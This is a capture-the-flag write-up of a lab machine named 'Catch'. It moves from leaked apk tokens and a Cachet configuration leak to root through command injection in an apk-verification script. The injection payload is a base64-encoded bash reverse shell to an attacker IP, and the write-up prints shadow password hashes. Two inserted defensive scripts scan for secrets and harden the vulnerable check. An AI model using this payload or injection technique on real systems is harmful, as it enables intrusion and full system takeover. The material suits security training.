Basic information

Port scan

22,80,3000,5000,8000:

$ nmap -sC -sV 10.10.11.150
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-08 13:28 CST
Nmap scan report for 10.10.11.150
Host is up (0.20s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Catch Global Systems
|_http-server-header: Apache/2.4.41 (Ubuntu)
3000/tcp open ppp?
| fingerprint-strings:
| GenericLines, Help, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Content-Type: text/html; charset=UTF-8
| Set-Cookie: i_like_gitea=cae8621f0dff94e3; Path=/; HttpOnly
| Set-Cookie: _csrf=7M4wTONaVHZ3hEuwqiFsqOLml-Y6MTY0OTM5NTc1NzMxOTI1Mzc4NQ; Path=/; Expires=Sat, 09 Apr 2022 05:29:17 GMT; HttpOnly; SameSite=Lax
| Set-Cookie: macaron_flash=; Path=/; Max-Age=0; HttpOnly
| X-Frame-Options: SAMEORIGIN
| Date: Fri, 08 Apr 2022 05:29:17 GMT
| <!DOCTYPE html>
| <html lang="en-US" class="theme-">
| <head data-suburl="">
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title> Catch Repositories </title>
| <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiQ2F0Y2ggUmVwb3NpdG9yaWVzIiwic2hvcnRfbmFtZSI6IkNhdGNoIFJlcG9zaXRvcmllcyIsInN0YXJ0X3VybCI6Imh0dHA6Ly9naXRlYS5jYXRjaC5odGI6MzAwMC8iLCJpY29ucyI6W3sic3JjIjoiaHR0cDovL2dpdGVhLmNhdGNoLmh0Yjoz
| HTTPOptions:
| HTTP/1.0 405 Method Not Allowed
| Set-Cookie: i_like_gitea=3310d23dba07b622; Path=/; HttpOnly
| Set-Cookie: _csrf=gfXxdWe0pNU-2yj7CJmpTYTBtQ46MTY0OTM5NTc2MzM3MTk3ODkzMA; Path=/; Expires=Sat, 09 Apr 2022 05:29:23 GMT; HttpOnly; SameSite=Lax
| Set-Cookie: macaron_flash=; Path=/; Max-Age=0; HttpOnly
| X-Frame-Options: SAMEORIGIN
| Date: Fri, 08 Apr 2022 05:29:23 GMT
|_ Content-Length: 0
5000/tcp open upnp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, RPCCheck, RTSPRequest, SMBProgNeg, ZendJavaBridge:
| HTTP/1.1 400 Bad Request
| Connection: close
| GetRequest:
| HTTP/1.1 302 Found
| X-Frame-Options: SAMEORIGIN
| X-Download-Options: noopen
| X-Content-Type-Options: nosniff
| X-XSS-Protection: 1; mode=block
| Content-Security-Policy:
| X-Content-Security-Policy:
| X-WebKit-CSP:
| X-UA-Compatible: IE=Edge,chrome=1
| Location: /login
| Vary: Accept, Accept-Encoding
| Content-Type: text/plain; charset=utf-8
| Content-Length: 28
| Set-Cookie: connect.sid=s%3AXXp6I72QuCEosvZoFuxBEZ0bpCuwBcMr.yyPLpvTFJxYads2rdwaRU3nMijrdq4miYZLeG3SGuIU; Path=/; HttpOnly
| Date: Fri, 08 Apr 2022 05:29:22 GMT
| Connection: close
| Found. Redirecting to /login
| HTTPOptions:
| HTTP/1.1 200 OK
| X-Frame-Options: SAMEORIGIN
| X-Download-Options: noopen
| X-Content-Type-Options: nosniff
| X-XSS-Protection: 1; mode=block
| Content-Security-Policy:
| X-Content-Security-Policy:
| X-WebKit-CSP:
| X-UA-Compatible: IE=Edge,chrome=1
| Allow: GET,HEAD
| Content-Type: text/html; charset=utf-8
| Content-Length: 8
| ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
| Set-Cookie: connect.sid=s%3AaOwhTa3pPTNrGsrD5qPMN7SaVBU9Jxpm.G3CN12m3ivfC%2B9bHgwJ0Svaec%2FJWqcT9Ija4G7ZVCdc; Path=/; HttpOnly
| Vary: Accept-Encoding
| Date: Fri, 08 Apr 2022 05:29:24 GMT
| Connection: close
|_ GET,HEAD
8000/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Catch Global Systems
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port3000-TCP:V=7.92%I=7%D=4/8%Time=624FC82C%P=x86_64-apple-darwin20.4.0
SF:%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:
SF:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20
SF:Bad\x20Request")%r(GetRequest,30E3,"HTTP/1\.0\x20200\x20OK\r\nContent-T
SF:ype:\x20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20i_like_gitea=cae8
SF:621f0dff94e3;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=7M4wTONaVH
SF:Z3hEuwqiFsqOLml-Y6MTY0OTM5NTc1NzMxOTI1Mzc4NQ;\x20Path=/;\x20Expires=Sat
SF:,\x2009\x20Apr\x202022\x2005:29:17\x20GMT;\x20HttpOnly;\x20SameSite=Lax
SF:\r\nSet-Cookie:\x20macaron_flash=;\x20Path=/;\x20Max-Age=0;\x20HttpOnly
SF:\r\nX-Frame-Options:\x20SAMEORIGIN\r\nDate:\x20Fri,\x2008\x20Apr\x20202
SF:2\x2005:29:17\x20GMT\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"
SF:\x20class=\"theme-\">\n<head\x20data-suburl=\"\">\n\t<meta\x20charset=\
SF:"utf-8\">\n\t<meta\x20name=\"viewport\"\x20content=\"width=device-width
SF:,\x20initial-scale=1\">\n\t<meta\x20http-equiv=\"x-ua-compatible\"\x20c
SF:ontent=\"ie=edge\">\n\t<title>\x20Catch\x20Repositories\x20</title>\n\t
SF:<link\x20rel=\"manifest\"\x20href=\"data:application/json;base64,eyJuYW
SF:1lIjoiQ2F0Y2ggUmVwb3NpdG9yaWVzIiwic2hvcnRfbmFtZSI6IkNhdGNoIFJlcG9zaXRvc
SF:mllcyIsInN0YXJ0X3VybCI6Imh0dHA6Ly9naXRlYS5jYXRjaC5odGI6MzAwMC8iLCJpY29u
SF:cyI6W3sic3JjIjoiaHR0cDovL2dpdGVhLmNhdGNoLmh0Yjoz")%r(Help,67,"HTTP/1\.1
SF:\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=ut
SF:f-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(HTTPOption
SF:s,17F,"HTTP/1\.0\x20405\x20Method\x20Not\x20Allowed\r\nSet-Cookie:\x20i
SF:_like_gitea=3310d23dba07b622;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20
SF:_csrf=gfXxdWe0pNU-2yj7CJmpTYTBtQ46MTY0OTM5NTc2MzM3MTk3ODkzMA;\x20Path=/
SF:;\x20Expires=Sat,\x2009\x20Apr\x202022\x2005:29:23\x20GMT;\x20HttpOnly;
SF:\x20SameSite=Lax\r\nSet-Cookie:\x20macaron_flash=;\x20Path=/;\x20Max-Ag
SF:e=0;\x20HttpOnly\r\nX-Frame-Options:\x20SAMEORIGIN\r\nDate:\x20Fri,\x20
SF:08\x20Apr\x202022\x2005:29:23\x20GMT\r\nContent-Length:\x200\r\n\r\n")%
SF:r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x
SF:20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Ba
SF:d\x20Request");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port5000-TCP:V=7.92%I=7%D=4/8%Time=624FC831%P=x86_64-apple-darwin20.4.0
SF:%r(GetRequest,23A,"HTTP/1\.1\x20302\x20Found\r\nX-Frame-Options:\x20SAM
SF:EORIGIN\r\nX-Download-Options:\x20noopen\r\nX-Content-Type-Options:\x20
SF:nosniff\r\nX-XSS-Protection:\x201;\x20mode=block\r\nContent-Security-Po
SF:licy:\x20\r\nX-Content-Security-Policy:\x20\r\nX-WebKit-CSP:\x20\r\nX-U
SF:A-Compatible:\x20IE=Edge,chrome=1\r\nLocation:\x20/login\r\nVary:\x20Ac
SF:cept,\x20Accept-Encoding\r\nContent-Type:\x20text/plain;\x20charset=utf
SF:-8\r\nContent-Length:\x2028\r\nSet-Cookie:\x20connect\.sid=s%3AXXp6I72Q
SF:uCEosvZoFuxBEZ0bpCuwBcMr\.yyPLpvTFJxYads2rdwaRU3nMijrdq4miYZLeG3SGuIU;\
SF:x20Path=/;\x20HttpOnly\r\nDate:\x20Fri,\x2008\x20Apr\x202022\x2005:29:2
SF:2\x20GMT\r\nConnection:\x20close\r\n\r\nFound\.\x20Redirecting\x20to\x2
SF:0/login")%r(RTSPRequest,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConne
SF:ction:\x20close\r\n\r\n")%r(DNSVersionBindReqTCP,2F,"HTTP/1\.1\x20400\x
SF:20Bad\x20Request\r\nConnection:\x20close\r\n\r\n")%r(SMBProgNeg,2F,"HTT
SF:P/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n")%r(Zen
SF:dJavaBridge,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20cl
SF:ose\r\n\r\n")%r(HTTPOptions,245,"HTTP/1\.1\x20200\x20OK\r\nX-Frame-Opti
SF:ons:\x20SAMEORIGIN\r\nX-Download-Options:\x20noopen\r\nX-Content-Type-O
SF:ptions:\x20nosniff\r\nX-XSS-Protection:\x201;\x20mode=block\r\nContent-
SF:Security-Policy:\x20\r\nX-Content-Security-Policy:\x20\r\nX-WebKit-CSP:
SF:\x20\r\nX-UA-Compatible:\x20IE=Edge,chrome=1\r\nAllow:\x20GET,HEAD\r\nC
SF:ontent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x208\r\n
SF:ETag:\x20W/\"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg\"\r\nSet-Cookie:\x20connect\
SF:.sid=s%3AaOwhTa3pPTNrGsrD5qPMN7SaVBU9Jxpm\.G3CN12m3ivfC%2B9bHgwJ0Svaec%
SF:2FJWqcT9Ija4G7ZVCdc;\x20Path=/;\x20HttpOnly\r\nVary:\x20Accept-Encoding
SF:\r\nDate:\x20Fri,\x2008\x20Apr\x202022\x2005:29:24\x20GMT\r\nConnection
SF::\x20close\r\n\r\nGET,HEAD")%r(RPCCheck,2F,"HTTP/1\.1\x20400\x20Bad\x20
SF:Request\r\nConnection:\x20close\r\n\r\n")%r(DNSStatusRequestTCP,2F,"HTT
SF:P/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n")%r(Hel
SF:p,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\
SF:n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 152.22 seconds

80

Main site, which offers an apk download:

3000

gitea 1.14.1:

5000

lets chat:

8000

Cachet:

catchv1.0.apk

Decompiling the apk reveals several hard-coded tokens:

<string name="gitea_token">b87bfb6345ae72ed5ecdcee05bcb34c83806fbd0</string>
<string name="lets_chat_token">NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ==</string>
<string name="slack_token">xoxp-23984754863-2348975623103</string>
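Resources like the three above are exactly what a pre-release check on the decoded apk should catch before it ever reaches a download page. The following script is an added example, not part of the original post or the Catch project: it scans an apktool-decoded res/values/strings.xml and flags a resource when its name looks sensitive (token, secret, password, api_key) or when its value is shaped like a Slack token, a long hex string or a long base64 string. The thresholds, patterns and function names are this example's own assumptions, and the sample values used with it are constructed placeholders, not the page's tokens.

```shell
#!/bin/sh
# Added example (not from the original post): scan an apktool-decoded
# res/values/strings.xml for credentials that should never ship in an APK.
# Patterns and length thresholds below are assumptions for this example.

# Print "name<TAB>value<TAB>reason" for each suspicious <string> resource.
# Returns 0 when nothing was flagged, 1 otherwise (usable as a CI gate).
scan_strings_for_secrets() {
    hits=0
    while IFS= read -r line; do
        # Only look at single-line <string name="...">...</string> resources.
        case "$line" in *'<string name="'*'</string>'*) ;; *) continue ;; esac
        name=$(printf '%s\n' "$line" | sed -n 's/.*<string name="\([^"]*\)">.*/\1/p')
        value=$(printf '%s\n' "$line" | sed -n 's/.*<string name="[^"]*">\(.*\)<\/string>.*/\1/p')
        reason=""
        # 1. The resource name itself announces a credential.
        case "$name" in
            *[Tt]oken*|*[Ss]ecret*|*[Pp]assword*|*[Aa]pi_[Kk]ey*) reason="sensitive resource name" ;;
        esac
        # 2. Slack-style token prefixes (xoxp-, xoxb-, xoxa-).
        if [ -z "$reason" ]; then
            case "$value" in
                xoxp-*|xoxb-*|xoxa-*) reason="Slack-style token value" ;;
            esac
        fi
        # 3. Long hex strings, the usual shape of API tokens and hashes.
        if [ -z "$reason" ] && printf '%s\n' "$value" | grep -Eq '^[0-9a-fA-F]{32,}$'; then
            reason="long hex value"
        fi
        # 4. Long base64 strings (e.g. base64-encoded "id:secret" pairs).
        if [ -z "$reason" ] && printf '%s\n' "$value" | grep -Eq '^[A-Za-z0-9+/]{40,}={0,2}$'; then
            reason="long base64 value"
        fi
        if [ -n "$reason" ]; then
            hits=$((hits + 1))
            printf '%s\t%s\t%s\n' "$name" "$value" "$reason"
        fi
    done < "$1"
    [ "$hits" -eq 0 ]
}

# Number of flagged resources, for scripts that just want a count.
count_secret_hits() {
    scan_strings_for_secrets "$1" | wc -l | tr -d ' '
}

# Demo on a constructed strings.xml with placeholder values (run with SCAN_DEMO=1).
demo() {
    tmp=$(mktemp -d)
    cat > "$tmp/strings.xml" <<'EOF'
<resources>
    <string name="app_name">Catch Global</string>
    <string name="gitea_token">0123456789abcdef0123456789abcdef01234567</string>
    <string name="slack_token">xoxp-000000000000-000000000000</string>
</resources>
EOF
    scan_strings_for_secrets "$tmp/strings.xml" || echo "[!] $(count_secret_hits "$tmp/strings.xml") secret-shaped resources found"
    rm -rf "$tmp"
}
if [ "${SCAN_DEMO:-0}" = "1" ]; then demo; fi
```

Run it against `apktool d` output as a build step: `scan_strings_for_secrets build/res/values/strings.xml || exit 1` fails the pipeline as soon as a token lands in a resource, which is far cheaper than rotating the Gitea, Let's Chat and Slack credentials after the apk has been published.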

lets-chat

Following the documentation, the API is called with the token; one of the rooms contains a set of credentials, and the status domain name shows they should belong to the service on port 8000:

curl -H "Authorization: bearer NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ==" "http://10.10.11.150:5000/rooms" | jq
curl -H "Authorization: bearer NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ==" "http://10.10.11.150:5000/rooms/61b86b28d984e2451036eb17/messages" | jq

{
"id": "61b8702dfe190b466d476bfa",
"text": "Here are the credentials `john : E}V!mywu_69T4C}W`",
"posted": "2021-12-14T10:21:33.859Z",
"owner": "61b86f15fe190b466d476bf5",
"room": "61b86b28d984e2451036eb17"
},

status.catch.htb

cachet

Logging into Cachet on port 8000 with these credentials, the settings page shows the version number, 2.4.0-dev:

Related vulnerabilities can be found:

CVE-2021-39174

One of these can be used here to read configuration-file information: modify, save, then view it again to obtain the configuration data:

${DB_USERNAME} will
${DB_PASSWORD} s2#4Fg0_%3!

user flag

Logging in over SSH with the credentials obtained above gives user.txt:

Privilege escalation information

/opt/mdm/verify.sh: its app_check function extracts APP_NAME from the apk and concatenates it into a command, leaving a command injection:

/opt/mdm/verify.sh

#!/bin/bash

###################
# Signature Check #
###################

sig_check() {
    jarsigner -verify "$1/$2" 2>/dev/null >/dev/null
    if [[ $? -eq 0 ]]; then
        echo '[+] Signature Check Passed'
    else
        echo '[!] Signature Check Failed. Invalid Certificate.'
        cleanup
        exit
    fi
}

#######################
# Compatibility Check #
#######################

comp_check() {
    apktool d -s "$1/$2" -o $3 2>/dev/null >/dev/null
    COMPILE_SDK_VER=$(grep -oPm1 "(?<=compileSdkVersion=\")[^\"]+" "$PROCESS_BIN/AndroidManifest.xml")
    if [ -z "$COMPILE_SDK_VER" ]; then
        echo '[!] Failed to find target SDK version.'
        cleanup
        exit
    else
        if [ $COMPILE_SDK_VER -lt 18 ]; then
            echo "[!] APK Doesn't meet the requirements"
            cleanup
            exit
        fi
    fi
}

####################
# Basic App Checks #
####################

app_check() {
    APP_NAME=$(grep -oPm1 "(?<=<string name=\"app_name\">)[^<]+" "$1/res/values/strings.xml")
    echo $APP_NAME
    if [[ $APP_NAME == *"Catch"* ]]; then
        echo -n $APP_NAME|xargs -I {} sh -c 'mkdir {}'
        mv "$3/$APK_NAME" "$2/$APP_NAME/$4"
    else
        echo "[!] App doesn't belong to Catch Global"
        cleanup
        exit
    fi
}


###########
# Cleanup #
###########

cleanup() {
    rm -rf $PROCESS_BIN;rm -rf "$DROPBOX/*" "$IN_FOLDER/*";rm -rf $(ls -A /opt/mdm | grep -v apk_bin | grep -v verify.sh)
}


###################
# MDM CheckerV1.0 #
###################

DROPBOX=/opt/mdm/apk_bin
IN_FOLDER=/root/mdm/apk_bin
OUT_FOLDER=/root/mdm/certified_apps
PROCESS_BIN=/root/mdm/process_bin

for IN_APK_NAME in $DROPBOX/*.apk;do
    OUT_APK_NAME="$(echo ${IN_APK_NAME##*/} | cut -d '.' -f1)_verified.apk"
    APK_NAME="$(openssl rand -hex 12).apk"
    if [[ -L "$IN_APK_NAME" ]]; then
        exit
    else
        mv "$IN_APK_NAME" "$IN_FOLDER/$APK_NAME"
    fi
    sig_check $IN_FOLDER $APK_NAME
    comp_check $IN_FOLDER $APK_NAME $PROCESS_BIN
    app_check $PROCESS_BIN $OUT_FOLDER $IN_FOLDER $OUT_APK_NAME
done
cleanup
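The root cause in the script above is that app_check hands an attacker-controlled string (the app_name resource) to `xargs -I {} sh -c 'mkdir {}'`, so the name is interpreted by a shell rather than used as data. The following is an added example, not part of the original verify.sh: a hardened replacement for app_check that validates app_name against a strict allowlist before any use and then creates the directory with a quoted argument and no intermediate shell. The function names, the allowlist and the demo files are this example's own assumptions; the "must contain Catch" policy is kept from the original.

```shell
#!/bin/sh
# Added example, not part of the original /opt/mdm/verify.sh: a hardened
# app_check. Function names, allowlist and demo inputs are assumptions.

# Pull app_name out of an apktool-decoded res/values/strings.xml (first match only).
extract_app_name() {
    sed -n 's/.*<string name="app_name">\([^<]*\)<\/string>.*/\1/p' "$1" | head -n 1
}

# Allowlist: letters, digits, space, dot, underscore, hyphen; nothing else.
# Anything a shell would treat specially (| ; $ ` & newline ...) is rejected.
# The original policy (name must contain "Catch") is kept as well.
valid_app_name() {
    name=$1
    nl=$(printf '\nx'); nl=${nl%x}
    [ -n "$name" ] || return 1
    case "$name" in *"$nl"*) return 1 ;; esac
    rest=$(printf '%s' "$name" | LC_ALL=C tr -d 'A-Za-z0-9._ -')
    [ -z "$rest" ] || return 1
    case "$name" in *Catch*) return 0 ;; esac
    return 1
}

# Hardened app_check: validate first, then create the directory without
# invoking a shell on the name. Prints the directory; returns 1 on rejection.
safe_app_check() {
    strings_xml=$1
    out_folder=$2
    app_name=$(extract_app_name "$strings_xml")
    if ! valid_app_name "$app_name"; then
        echo "[!] Rejected app_name: $app_name" >&2
        return 1
    fi
    mkdir -p -- "$out_folder/$app_name"
    printf '%s\n' "$out_folder/$app_name"
}

# Demo against two constructed strings.xml files (run with MDM_DEMO=1).
demo() {
    tmp=$(mktemp -d)
    printf '<resources>\n    <string name="app_name">Catch Global</string>\n</resources>\n' > "$tmp/good.xml"
    printf '<resources>\n    <string name="app_name">Catch|id</string>\n</resources>\n' > "$tmp/bad.xml"
    safe_app_check "$tmp/good.xml" "$tmp/certified"
    safe_app_check "$tmp/bad.xml" "$tmp/certified" || echo "[+] injection-shaped name rejected"
    rm -rf "$tmp"
}
if [ "${MDM_DEMO:-0}" = "1" ]; then demo; fi
```

Two further points for anyone running a checker like this as root: the signature check only proves the apk was signed by some key, not by the company's key, so `jarsigner -verify` should be paired with a comparison of the signing certificate against a pinned one; and a drop-box directory writable by an unprivileged user is itself an input channel, so the validation above belongs on every value taken from the apk, not just app_name.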

Privilege escalation & root flag

Modify the apk, injecting a command into app_name, rebuild and sign it, then upload the generated apk to the corresponding directory and wait for the command to execute:

echo '/bin/bash -i >& /dev/tcp/10.10.14.13/4444 0>&1' | base64
L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjEzLzQ0NDQgMD4mMQo=

<string name="app_name">Catch|echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjEzLzQ0NDQgMD4mMQo= | base64 -d | bash</string>

java -jar /usr/local/Cellar/apktool/2.6.1/libexec/apktool_2.6.1.jar d catchv1.0.apk

java -jar /usr/local/Cellar/apktool/2.6.1/libexec/apktool_2.6.1.jar b -f -d catchv1.0 -o catchv2.0.apk

keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore catchv2.0.apk alias_name
jarsigner -verify -verbose -certs catchv2.0.apk

cp catchv2.0.apk /opt/mdm/apk_bin

root flag

shadow

root:$6$HJWtdM63SqnL6alL$h/FUZ0TNaCCrCgEzeuT9ityQcDmYcMCA0fErrvkZVBmf0TQJntGSRMDo.AXZA9V00.qAsZ04554.dUJcFszUM1:18976:0:99999:7:::
will:$6$UlC1gE5S4qWU4bz8$XLnV0mDyqZ61IwRXwC8CGLfaVbF9bJ7uMerWNz1FvjqHShP0spDJmw3O.Iz7Zt7jbvH6X4w2N9PIV6NL6Hhjy.:18976:0:99999:7:::

References